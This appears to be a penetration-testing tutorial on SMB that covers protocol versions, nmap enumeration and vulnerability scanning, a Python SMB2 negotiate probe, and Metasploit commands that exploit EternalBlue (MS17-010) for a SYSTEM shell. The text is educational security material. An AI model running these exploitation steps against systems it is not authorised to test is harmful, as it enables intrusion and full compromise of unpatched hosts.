Understanding SMB
SMB (Server Message Block) is a network file and resource sharing protocol that
follows the client-server model. Any client on the network can talk to an SMB
server to access resources such as files and directories, or to submit work such
as print jobs over the network.
How SMB Works
SMB communication is not difficult to understand. The client connects to the SMB server over TCP port 445 (direct hosting, used by all current versions; older deployments ran SMB over the NetBIOS session service on port 139) and accesses the shares. Once the client has access to a share, it can mount it on its own system and work with the files in place, without copying them to the local machine, or print through a network printer.
Versions of SMB
SMB v1: The first version of SMB. It originated at IBM in the early 1980s and
went through many revisions. Microsoft's dialect of it, renamed CIFS (Common
Internet File System) in 1996, shipped with Windows 95 and Windows NT. This
version should never be used on a modern network: it has no encryption, its
message signing rests on MD5, and its server implementation has a long history
of memory-safety bugs. The MS17-010 bugs behind the WannaCry and NotPetya
outbreaks were flaws of this last kind (buffer handling in the SMBv1 transaction
code), not a consequence of the missing encryption.
SMBv2: This version was introduced with Windows Vista and Server 2008. It
improved performance (fewer, larger commands and request pipelining) and offered
security enhancements over the previous version, including HMAC-SHA256 message
signing. Version 2.1 followed in Windows 7 and Windows Server 2008 R2 and
introduced leases, an extension of the opportunistic lock (oplock) caching
mechanism.
SMBv3: The latest and most secure version of SMB so far. It added encryption of
SMB traffic between client and server (AES-CCM, enabled per share or per
session) and AES-CMAC signing. It first shipped with Windows 8 and Server 2012;
version 3.0.2 followed in Windows 8.1 and Server 2012 R2. The current dialect is
3.1.1, used by Windows 10 and Server 2016 and later, which adds
pre-authentication integrity checking of the negotiate exchange and AES-GCM
encryption.
Enumeration:
In this phase, as a pentester one should look for the following information
from the SMB service:
- Banner grabbing
- User listing
- Workgroup or domain membership
- Network share information
- Remote operating system
- SMB dialect and security mode (whether message signing is required)
To get the above details we use the popular network scanning tool nmap. The -A
option enables OS detection, version detection and the default NSE scripts,
which for SMB include smb-os-discovery and smb2-security-mode:
nmap -p 445,139 -A 192.168.1.10
The information we get from the result is:
Operating system: Windows 7 Ultimate
Computer name: WIN-8KGN3AE06PK
SMB2 security mode: dialect 2.02 (the smb2-security-mode output also states whether message signing is merely enabled or actually required)
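The "2.02" above is the dialect the server selected during the SMB2 NEGOTIATE exchange, and the signing policy comes from the SecurityMode field of the same response. The following probe, an added example that is not code from the original post, builds that request by hand, parses the reply (SMB2 or a legacy SMB1 reply) and reports dialect and signing flags. The function names, the 192.168.1.10 target and the sample_response() bytes are assumptions for illustration; the sample is constructed, not a capture. It deliberately does not offer dialect 3.1.1, because a 3.1.1 negotiate must carry negotiate contexts that this minimal client does not build.

```python
"""Minimal SMB2 negotiate probe: reports the dialect a server picks and its
message-signing policy, i.e. what nmap's smb2-security-mode prints as
"2.02: Message signing enabled but not required".  Added example, not
code from the original post."""
import socket
import struct
import uuid

# Dialects offered, oldest first (same numbering the nmap output uses).
# 0x0311 is deliberately left out: a 3.1.1 negotiate must carry negotiate
# contexts (pre-authentication integrity), which this tiny client omits.
DIALECTS = [0x0202, 0x0210, 0x0300, 0x0302]
DIALECT_NAMES = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
                 0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002   # SMB2 SecurityMode bits
SMB2_HEADER = "<4sHHIHHIIQIIQ16s"                    # 64 bytes, little-endian


def build_smb2_negotiate(client_guid=None):
    """Return an SMB2 NEGOTIATE request with the 4-byte NetBIOS length prefix."""
    header = struct.pack(SMB2_HEADER, b"\xfeSMB", 64, 0, 0,
                         0,            # Command 0 = NEGOTIATE
                         1, 0, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHHI16sQ", 36, len(DIALECTS),
                       SIGNING_ENABLED,  # we are able to sign
                       0, 0, (client_guid or uuid.uuid4()).bytes, 0)
    body += struct.pack("<%dH" % len(DIALECTS), *DIALECTS)
    msg = header + body
    return struct.pack(">I", len(msg)) + msg   # type byte 0x00 + 24-bit length


def parse_negotiate_response(msg):
    """Parse a server reply (NetBIOS prefix already stripped) into a dict."""
    if msg[:4] == b"\xfeSMB":
        status, command = struct.unpack_from("<IH", msg, 8)
        if command != 0 or status != 0:
            raise ValueError("unexpected SMB2 reply: cmd=%d status=0x%08x"
                             % (command, status))
        size, sec_mode, dialect = struct.unpack_from("<HHH", msg, 64)
        if size != 65:
            raise ValueError("bad NEGOTIATE response StructureSize %d" % size)
        return {"protocol": "SMB2",
                "dialect": DIALECT_NAMES.get(dialect, hex(dialect)),
                "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
                "signing_required": bool(sec_mode & SIGNING_REQUIRED)}
    if msg[:4] == b"\xffSMB":
        # SMB1 header is 32 bytes; then WordCount, DialectIndex, SecurityMode.
        # SMB1 SecurityMode bits: 0x04 signing enabled, 0x08 signing required.
        _words, dialect_index, sec_mode = struct.unpack_from("<BHB", msg, 32)
        return {"protocol": "SMB1", "dialect": "index %d" % dialect_index,
                "signing_enabled": bool(sec_mode & 0x04),
                "signing_required": bool(sec_mode & 0x08)}
    raise ValueError("not an SMB reply")


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during negotiate")
        buf += chunk
    return buf


def probe(host, port=445, timeout=5.0):
    """Connect to host:port, negotiate, and return the parsed result."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_smb2_negotiate())
        length = struct.unpack(">I", _recv_exact(sock, 4))[0] & 0xFFFFFF
        return parse_negotiate_response(_recv_exact(sock, length))


def sample_response(dialect=0x0202, sec_mode=SIGNING_ENABLED):
    """Constructed SMB2 NEGOTIATE response for offline testing (not a capture)."""
    header = struct.pack(SMB2_HEADER, b"\xfeSMB", 64, 0, 0, 0, 1,
                         0x00000001,   # SMB2_FLAGS_SERVER_TO_REDIR
                         0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, sec_mode, dialect, 0,
                       uuid.uuid4().bytes, 0, 65536, 65536, 65536, 0, 0,
                       128, 0, 0) + b"\x00"
    return header + body


if __name__ == "__main__":
    import sys
    # e.g. python smbprobe.py 192.168.1.10 ; without an argument, parse the sample
    print(probe(sys.argv[1]) if len(sys.argv) > 1
          else parse_negotiate_response(sample_response()))
```

A Windows 7 host answering with dialect 0x0202 and SecurityMode 0x0001 is exactly the "2.02, signing enabled but not required" case the nmap output summarises; "signing_required": False is the condition that makes NTLM relay against that host feasible. A reply starting with 0xFF 'SMB' instead of 0xFE 'SMB' means the server fell back to SMBv1, which is the first thing to record for the vulnerability scan that follows.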
Scanning for vulnerabilities:
After enumeration we have the dialect information and the host operating system.
Now it is time for vulnerability scanning, again with nmap, which ships a number
of NSE scripts for known SMB vulnerabilities. Quote the wildcard so the shell
does not expand it against local filenames:
nmap --script "smb-vuln*" -p 445 192.168.1.10
The scan results show the host is vulnerable to EternalBlue (MS17-010, reported by the smb-vuln-ms17-010 script) because SMBv1 is enabled and the host is unpatched.
Exploiting SMB vulnerability:
Now that we have the vulnerability information we exploit it with Metasploit and
gain a shell on the target; because the bug is in the kernel-mode SMB server, the
resulting session runs as SYSTEM.
We run the following in msfconsole on the attacker system. The module's check
command confirms the target is vulnerable before anything is launched, which
matters here because a failed EternalBlue attempt can crash the target:
> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOSTS <Victim IP>
> check
> exploit
Closing words:
This is not the only way to attack SMB; other ways include PsExec-style remote
execution with valid credentials, password brute-forcing and NTLM hash capture.
I feel the above technique is not that complex, as Metasploit always makes a
hacker's life easy.
I hope you find this article valuable and helpful. Happy Hacking!!